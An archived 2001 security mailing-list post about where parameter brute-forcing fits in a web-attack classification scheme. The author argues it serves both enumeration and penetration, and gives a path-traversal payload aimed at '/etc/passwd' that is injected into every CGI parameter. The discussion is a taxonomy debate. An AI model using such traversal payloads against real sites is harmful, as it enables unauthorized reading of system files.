|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Jeremiah Grossman (jeremiah
whitehatsec.com)Date: Mon Oct 01 2001 - 12:09:16 CDT
Dennis Groves wrote:
> >
> > hiall,
> >
> > sorry for this late input/question .. but .. which category does
> >
> > "PARAMETER BRUTE-FORCING/GUESSING"
> >
>
> What will you do with this information? How does it break a web application?
> I am inclined to think that it belongs in INFORMATION GATHERING as CGI
> PARAMETER ENUMERATION.
>
> Dennis
This is little about what someone said before... "attacks covering multiple
classes".
Parameter Brute Forcing is a real attack and can be used for both enumeration
AND penetration. Case in point...
the recent apache bug that can gather active usernames on the system... or
scripting a parameter tampert attack that replaces all parameters in all
cgi's on a site with a "../../../../../../etc/passwd". Yes, this has worked on
many high profile sites.
So, as you can see, its both.
The kind of things we have to work though on not get hung up on.
Jer-
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]